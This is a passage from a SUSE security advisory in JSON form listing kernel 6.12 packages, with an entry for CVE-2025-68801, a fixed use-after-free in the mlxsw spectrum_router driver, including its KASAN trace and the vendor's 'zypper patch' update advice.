"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
